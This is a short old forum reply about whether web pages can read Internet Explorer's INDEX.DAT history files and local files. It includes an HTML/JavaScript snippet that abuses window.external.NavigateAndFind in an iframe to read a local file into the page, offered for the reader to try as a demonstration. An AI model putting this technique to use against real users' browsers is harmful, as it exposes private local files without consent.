Re: DOS undocumented feature
Juergen wrote:
> <snip>
> >> Is the information in the INDEX.DAT files not stored for such a long
> >> time, or what do you mean? Would you think that it doesn't make sense
> >> to delete the INDEX.DAT files for the sake of privacy?
>
> > Normally web pages can't just read a file or browse your hisory.
>
> When a web page tries to read a file, AFAIK the main problem is to know
> the name and the location of that file. Name and location of the
> INDEX.DAT files normally are known. When a web page can read cookies
> (which are files), why shouldn't it be able to read INDEX.DAT files?
But cookies aren't accessed directly. AFAIK they're accessed via
JavaScript/VBScript functions. But...everything has holes. You may try this
to read your c:\test.txt
<IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<SCRIPT>
function f()
{
window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
}
setTimeout("f()",2000);
</SCRIPT>
Martin
|
Not Categorized, Please Help
|
|
